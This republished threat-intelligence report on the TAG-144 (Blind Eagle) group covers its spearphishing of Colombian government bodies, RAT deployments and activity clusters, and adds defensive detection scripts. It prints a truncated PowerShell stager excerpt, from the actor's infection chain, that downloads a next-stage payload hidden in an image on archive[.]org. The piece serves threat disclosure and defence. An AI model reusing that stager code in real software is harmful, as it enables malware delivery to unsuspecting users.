National Cyber Warfare Foundation (NCWF)

TAG-144's Persistent Grip on South American Organizations

2025-08-26 14:02:31
milo
Blue Team (CND)
Persistent cyber operations by TAG-144 (Blind Eagle) continue to target South American, primarily Colombian, government entities through advanced spearphishing and RAT-based malware campaigns. Explore the latest threat clusters, TTPs, and mitigation strategies.

Note: The analysis cut-off date for this report was July 21, 2025.


Executive Summary


Insikt Group has identified five distinct activity clusters linked to TAG-144 (also known as Blind Eagle). These clusters have operated at various times throughout 2024 and 2025, targeting a significant number of victims, primarily within the Colombian government across local, municipal, and federal levels. Although the clusters share similar tactics, techniques, and procedures (TTPs) such as leveraging open-source and cracked remote access trojans (RATs), dynamic domain providers, and legitimate internet services (LIS) for staging, they differ significantly in infrastructure, malware deployment, and other operational methods. Insikt Group also found further evidence linking TAG-144 to Red Akodon and identified various compromised Colombian government email accounts likely used in spearphishing campaigns.


To protect against TAG-144, security defenders should block IP addresses and domains tied to associated RATs, flag and potentially block connections to unusual LIS, and deploy updated detection rules (YARA, Sigma, Snort) for current and historic infections. Other controls include implementing email filtering and data exfiltration monitoring. See the Mitigations section for implementation guidance and Appendix B for a complete list of IoCs. In the long term, analysts should continuously monitor the cybercriminal ecosystem for emerging threats and adapt controls accordingly.


Key Findings



  • Insikt Group has tracked five distinct activity clusters associated with TAG-144 (Blind Eagle), each displaying overlapping yet varied TTPs and collectively targeting numerous victims, primarily within the Colombian government, throughout 2024 and 2025.

  • TAG-144 appears to maintain an extensive operational infrastructure, comprising virtual private servers (VPS), IP addresses within Colombian ISP ranges, and servers that appear to function as VPN servers. These typically host domains registered through various dynamic DNS services such as duckdns[.]org, noip[.]com, and con-ip[.]com, among others.

  • TAG-144 has employed a wide array of open-source and cracked RATs, including AsyncRAT, DcRAT, REMCOS RAT, XWorm, and LimeRAT, among others. These payloads are typically deployed through a multi-stage infection chain that leverages an expanding set of LIS and uses steganography to obscure malicious content and evade detection.


Background


TAG-144, also known as Blind Eagle, AguilaCiega, APT-C-36, and APT-Q-98, is a threat group that has been active since at least 2018, primarily targeting South America, especially Colombia. While the threat group’s overall motivation remains ambiguous, its activity reflects both cyber-espionage and financially driven motivations. TAG-144’s primary focus appears to be on credential theft, evidenced by banking-related keylogging and browser monitoring, alongside indications of espionage, such as persistently targeting government entities and using modified RATs with surveillance functions (1, 2).


The group’s primary targets include government institutions, especially judiciary and tax authorities, alongside financial entities, petroleum and energy companies, and organizations within the education, healthcare, manufacturing, and professional services sectors (1, 2). Operations are mainly focused on Colombia, with additional activity in Ecuador, Chile, and Panama, and occasional campaigns in North America targeting Spanish-speaking users.


Initial access typically occurs through spearphishing campaigns impersonating local government agencies, most notably Colombian authorities. These campaigns leverage themes such as debt collection and judicial notifications to lure victims into opening malicious documents (1, 2). They have often used URL shorteners like cort[.]as, acortaurl[.]com, and gtly[.]to to conceal malicious links and target users geographically. TAG-144 employs geo-fencing and other detection evasion measures that block access from outside Colombia or Ecuador, redirecting outsiders to official government websites. TAG-144 has consistently leveraged compromised email accounts in its spearphishing campaigns, including those associated with government entities and private individuals.


TAG-144 leverages a range of commodity remote access trojans (RATs), including AsyncRAT, REMCOS RAT, DcRAT, njRAT, LimeRAT, QuasarRAT, BitRAT, and a Quasar variant known as BlotchyQuasar. Its tooling also involves crypters such as HeartCrypt, PureCrypter, and those developed by threat actors like “Roda” and “pjoao1578”, with indicators pointing to the use of crypter-as-a-service offerings such as CryptersAndTools, which originates from Brazil. Additionally, it employs steganography techniques, embedding malicious payloads within image files to evade detection.


TAG-144’s command-and-control (C2) infrastructure often incorporates IP addresses from Colombian ISPs alongside virtual private servers (VPS) such as Proton666 and VPN services like Powerhouse Management, FrootVPN, and TorGuard (1, 2). This setup is further enhanced by the use of dynamic DNS services, including duckdns[.]org, ip-ddns[.]com, and noip[.]com. The threat group is suspected, though not definitively confirmed, to use compromised routers, which are then repurposed as reverse proxies to obscure the true locations of their C2 servers and complicate attribution.


The threat group has consistently leveraged LIS, particularly during the payload staging phase. These services include widely used platforms like Bitbucket, Discord, Dropbox, GitHub, Google Drive, Paste.ee, and lesser-known platforms such as undisclosed Brazilian image-hosting websites. Additionally, the group has been observed using compromised accounts to host malicious content, including a Google Drive folder tied to a compromised account associated with a regional Colombian government organization.


The threat group's origin remains uncertain, though multiple studies suggest it operates within the UTC-5 or UTC-4 time zones (1, 2), consistent with countries like Colombia and Ecuador, with some research specifically pointing to Colombia as its base. Notably, technical artifacts have contained both Spanish- and Portuguese-language comments. The Spanish observed in the comments closely resembles the regional dialects commonly spoken in the targeted countries. Additionally, the threat group has been observed using tools and services tied to the Brazilian cybercriminal underground, indicating a possible connection with Brazilian threat actors.


Three key factors set TAG-144 apart within the cybercriminal ecosystem. First, while globalization, cybercriminal collaboration, and hardware/software standardization have lowered the barriers for threat actors to operate globally, many actors, TAG-144 included, remain regionally focused because of cultural nuances, tacit local knowledge, and persistence. Second, despite some tooling improvements, TAG-144 has relied on largely the same techniques since its emergence; its continued success, reflected in a high number of victims, shows that well-established methods remain effective over time. Lastly, TAG-144 exemplifies the increasingly blurred line between cybercrime and espionage, a trend that has become more prominent in recent years. In this context, a comprehensive approach to tackling cyber threats becomes even more crucial, requiring improved defenses, deeper regional knowledge, and enhanced coordination.


Threat Analysis


Insikt Group identified five activity clusters associated with TAG-144 that were active between May 2024 and July 2025 (see Figure 1). Activity periods were determined based on domain resolutions, sample submissions, and victim traffic, as observed through Recorded Future® Network Intelligence.

Figure 1: Cluster activity timelines (Source: Recorded Future)



The following clusters have been observed:



  • Cluster 1, active from February through July 2025, comprises C2 IPs primarily associated with TorGuard VPN and one Colombian ISP hosting duckdns[.]org and, starting in July 2025, noip[.]com domains with static resolution and minimal rotation. Cluster 1 is linked to DcRAT, AsyncRAT, and REMCOS RAT infections targeting Colombian government entities exclusively.

  • Cluster 2, active between September and December 2024, included C2 IPs tied to AS-COLOCROSSING, Colombian ISPs, and VULTR hosting duckdns[.]org, con-ip[.]com, and kozow[.]com domains. Cluster 2 is associated with AsyncRAT activity targeting the Colombian government and entities in the education, defense, and retail sectors.

  • Cluster 3, active from September 2024 to July 2025, consists of C2 IPs linked to Colombian ISP UNE EPM hosting duckdns[.]org and, occasionally, con-ip[.]com domains. Cluster 3 is associated with both AsyncRAT and REMCOS RAT deployments.

  • Cluster 4, active from May 2024 to February 2025, is notable for combining malware and phishing infrastructure attributed to TAG-144.

  • Cluster 5, active from March to July 2025, consists of C2 IPs linked to GLESYS (AS42708) hosting dynamically resolving duckdns[.]org domains. Cluster 5 is associated with LimeRAT and a cracked AsyncRAT variant seen in Clusters 1 and 2.


Insikt Group identified infrastructure overlaps between the clusters, establishing a connection among them. Additionally, the clusters share notable similarities in TTPs, including infrastructure choices, domain naming patterns, malware deployment, and the abuse of LIS. However, each cluster also exhibits distinct differences, which are explored in detail in the following sections of this report.


Cluster 1


Infrastructure Analysis


Cluster 1, active from at least February through July 2025, comprises C2 IP addresses primarily linked to TorGuard VPN servers and, in one case, a Colombian ISP. This cluster typically hosts duckdns[.]org and, more recently, noip[.]com domains with specific naming patterns; it has also been observed deploying DcRAT, AsyncRAT, and REMCOS RAT. The IP addresses linked to Cluster 1 are listed in Appendix A. The domains consistently resolve to the same static IP addresses over time, with minimal rotation observed within Cluster 1.


The subdomain names, likely generated by a domain generation algorithm (DGA), commonly include the word “envio” followed by a numeric part, as in, for example, envio16-05[.]duckdns[.]org. The names are detectable via the regex in Figure 2 and are detailed in Appendix B.




envio[0-9\-]{2,5}\.duckdns\.org



Figure 2: Regex for suspected DGA linked to Cluster 1 (Source: Recorded Future)
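The regex in Figure 2 and the dynamic DNS providers named in the Key Findings (duckdns[.]org, noip[.]com, con-ip[.]com, and, for other clusters, kozow[.]com and ip-ddns[.]com) are the kind of signal a defender would run over resolver or proxy DNS logs. The script below is an added example, not code from the Recorded Future report: it anchors the Figure 2 regex, normalizes query names (lowercase, trailing root dot removed), and tags every query that either matches the suspected Cluster 1 pattern or lands under one of the listed dynamic DNS suffixes. The log format and client addresses are constructed for the example; the query names are the ones quoted in this report, apart from the benign www.example.com entry and the update-host.noip.com name, which is invented. A dynamic DNS match is a triage signal, not proof of compromise, since those services also carry legitimate traffic.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Figure 2 regex from the report (suspected Cluster 1 DGA names on duckdns[.]org),
# anchored and applied to a lowercased, un-dotted query name.
CLUSTER1_DGA = re.compile(r"^envio[0-9\-]{2,5}\.duckdns\.org$")

# Dynamic DNS providers the report ties to TAG-144 clusters. A match here is a
# triage signal, not proof of compromise: these services also carry benign traffic.
DYNDNS_SUFFIXES = ("duckdns.org", "noip.com", "con-ip.com", "kozow.com", "ip-ddns.com")

# Constructed sample DNS query log: "<timestamp> <client-ip> <qname> <qtype>".
# The duckdns names come from the report's text; clients, times and the noip
# host name are invented for the example.
SAMPLE_DNS_LOG = [
    "2025-06-01T10:00:00Z 10.20.30.40 envio16-05.duckdns.org A",
    "2025-06-01T10:00:05Z 10.20.30.41 www.example.com A",
    "2025-06-01T10:01:00Z 10.20.30.42 trabajonuevos.duckdns.org. A",
    "2025-07-15T08:30:00Z 10.20.30.43 update-host.noip.com A",
    "2025-07-15T08:31:00Z 10.20.30.44 malformed-line",
]


@dataclass
class Hit:
    timestamp: str
    client: str
    qname: str
    reason: str


def normalize(qname: str) -> str:
    """Lowercase and strip the trailing root dot that resolver logs often carry."""
    return qname.rstrip(".").lower()


def classify(qname: str) -> Optional[str]:
    """Return a reason string for a suspicious name, or None if nothing matches."""
    name = normalize(qname)
    if CLUSTER1_DGA.match(name):
        return "cluster1-dga"
    for suffix in DYNDNS_SUFFIXES:
        # Suffix match on a label boundary, so "duckdns.org.evil.example" does not hit.
        if name == suffix or name.endswith("." + suffix):
            return "dyndns:" + suffix
    return None


def triage(log_lines: List[str]) -> List[Hit]:
    """Scan log lines and collect every query that matches a TAG-144 naming signal."""
    hits = []
    for line in log_lines:
        parts = line.split()
        if len(parts) < 3:  # tolerate malformed lines instead of aborting the scan
            continue
        ts, client, qname = parts[0], parts[1], parts[2]
        reason = classify(qname)
        if reason is not None:
            hits.append(Hit(ts, client, normalize(qname), reason))
    return hits


if __name__ == "__main__":
    for hit in triage(SAMPLE_DNS_LOG):
        print(f"{hit.timestamp} {hit.client} {hit.qname} -> {hit.reason}")
```

Note that a name such as envio123456.duckdns.org falls outside the Figure 2 pattern (the numeric part is limited to five characters) but is still surfaced through the dynamic DNS suffix check, which is the intended layering: the precise regex gives a high-confidence Cluster 1 hit, the suffix list catches the broader infrastructure pattern for analyst review.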


While prior research has suggested that the TorGuard VPN servers associated with Cluster 1 are used for port forwarding, the exposure of C2 components, such as default transport layer security (TLS) certificates tied to deployed malware families, indicates these IP addresses are likely dedicated VPN instances directly controlled by TAG-144.


In addition to the TorGuard VPN servers, Cluster 1 includes IP addresses associated with Colombian ISPs, such as Colombia’s primary provider, COLOMBIA TELECOMUNICACIONES S.A. E.S.P. While earlier reporting on Blind Eagle in 2020 suggested the possible use of compromised routers for C2 infrastructure, Insikt Group has not confirmed such activity for the observed IP addresses.


Notably, several of the domains hosted on the TorGuard VPN servers, such as trabajonuevos[.]duckdns[.]org, previously resolved to IP addresses belonging to Colombian ISPs; these IP addresses and their associated domains are detailed in Appendix A. Similarly, certain domains, such as diazpool14[.]duckdns[.]org, were previously hosted on IP addresses linked to GLESYS (AS42708), an ASN identified in association with Cluster 5.


Abuse of Legitimate Internet Services, Including lovestoblog[.]com


As is typical for TAG-144, Cluster 1 has leveraged various LIS during staging, such as Tagbox, the Internet Archive (archive[.]org), Paste.ee, Discord, and Bitbucket, and, for the first time in TAG-144 activity, the free hosting platform lovestoblog[.]com operated by InfinityFree. More specifically, the subdomain sudo102[.]lovestoblog[.]com hosted several text files that loaded an encoded PowerShell script, which in turn retrieved the next stage of the infection chain from a JPG image hosted on archive[.]org. (See Figure 3 for the infection chain; line breaks were added for readability.)





# Stager excerpt (Figure 3). The variable names are the actor's own, apparently randomized, choices.
$craploads = 'SilentlyContinue'   # value conventionally used to silence PowerShell error output
$islamist = 'https://archive[.]org/download/new_image_20250531_1942/new_image.jpg'   # next stage hidden in a JPG on archive[.]org
$seiche = New-Object System.Net.WebClient   # downloader object for the image
$seiche.Headers.Add('User-Agent', 'Mozilla/5.0')   # generic browser-like User-Agent
[byte[   # the remainder of the script is not reproduced on this page
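The stager above pulls a JPG from archive[.]org and the report describes TAG-144 embedding payloads in image files via steganography, but the page does not say how the payload is placed inside the image. The example below is added here and is not the report's or the actor's code: it assumes the simplest common placement, a blob appended after the JPEG End-Of-Image (EOI) marker, and shows the check a responder would run on any image fetched in such a chain. It walks the JPEG marker structure rather than searching for the FF D9 byte pair, because APPn metadata (an EXIF thumbnail, for instance) can contain a complete nested JPEG with its own EOI and would make a naive search stop early. The sample image and payload are constructed inline; the payload is a labelled placeholder string, not malware.

```python
import base64
import binascii
from typing import Optional

SOI, EOI = b"\xff\xd8", b"\xff\xd9"


def jpeg_end_offset(image: bytes) -> int:
    """Walk the JPEG marker structure and return the offset just past the EOI marker
    that terminates the image. Walking segments (rather than searching for FF D9)
    matters because APPn metadata such as an EXIF thumbnail can contain a complete
    nested JPEG with its own EOI."""
    if image[:2] != SOI:
        raise ValueError("not a JPEG: missing SOI")
    pos, n = 2, len(image)
    while pos + 2 <= n:
        if image[pos] != 0xFF:
            raise ValueError(f"expected marker at offset {pos}")
        marker = image[pos + 1]
        if marker == 0xFF:                                   # fill byte, skip
            pos += 1
            continue
        if marker == 0xD9:                                   # EOI: image structure ends here
            return pos + 2
        if marker in (0x01, 0xD8) or 0xD0 <= marker <= 0xD7:  # standalone markers, no length
            pos += 2
            continue
        if pos + 4 > n:
            raise ValueError("truncated segment header")
        seg_len = int.from_bytes(image[pos + 2:pos + 4], "big")  # includes the 2 length bytes
        pos += 2 + seg_len
        if marker == 0xDA:                                   # SOS: entropy-coded data follows
            # Inside scan data, 0xFF is always followed by 0x00 (byte stuffing) or an
            # RSTn marker, so the first other 0xFF xx pair is the next real marker.
            while pos + 1 < n:
                b0, b1 = image[pos], image[pos + 1]
                if b0 == 0xFF and b1 != 0x00 and not (0xD0 <= b1 <= 0xD7):
                    break
                pos += 1
    raise ValueError("EOI not found")


def extract_appended_payload(image: bytes) -> bytes:
    """Bytes appended after the image's true end (empty for a clean file)."""
    return image[jpeg_end_offset(image):]


def try_base64(blob: bytes) -> Optional[bytes]:
    """Decode strictly; return None if the blob is not base64."""
    try:
        return base64.b64decode(blob, validate=True)
    except (binascii.Error, ValueError):
        return None


# --- Constructed sample (not a real TAG-144 artifact) ---
SAMPLE_PLAIN = b"constructed next-stage bytes, not real malware"
SAMPLE_PAYLOAD = base64.b64encode(SAMPLE_PLAIN)


def build_sample_jpeg(payload: bytes) -> bytes:
    """Minimal JPEG: APP0/JFIF, an APP1 carrying a nested SOI/EOI pair (as an EXIF
    thumbnail would), a tiny SOS with a stuffed 0xFF00, then EOI and the payload."""
    app0 = b"\xff\xe0" + (16).to_bytes(2, "big") + b"JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00"
    app1 = b"\xff\xe1" + (12).to_bytes(2, "big") + b"Exif\x00\x00" + SOI + EOI
    sos = b"\xff\xda" + (8).to_bytes(2, "big") + b"\x01\x01\x00\x00\x3f\x00"
    scan = b"\x12\x34\xff\x00\x56"
    return SOI + app0 + app1 + sos + scan + EOI + payload


if __name__ == "__main__":
    img = build_sample_jpeg(SAMPLE_PAYLOAD)
    tail = extract_appended_payload(img)
    print(f"{len(tail)} trailing bytes; decoded: {try_base64(tail)!r}")
```

A non-empty result from extract_appended_payload on an image a stager downloaded is a strong indicator on its own; the base64 decode is a convenience for the common case where the trailing blob is text-encoded so that PowerShell can turn it into a byte array, which is exactly what the `[byte[` fragment at the end of the excerpt above is beginning to do. If the actor instead hides data inside pixel values or in a metadata segment, this check returns empty and a different extractor is needed.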

Source: RecordedFuture
Source Link: https://www.recordedfuture.com/research/tag-144s-persistent-grip-on-south-american-organizations


Copyright 2012 through 2025 - National Cyber Warfare Foundation - All rights reserved worldwide.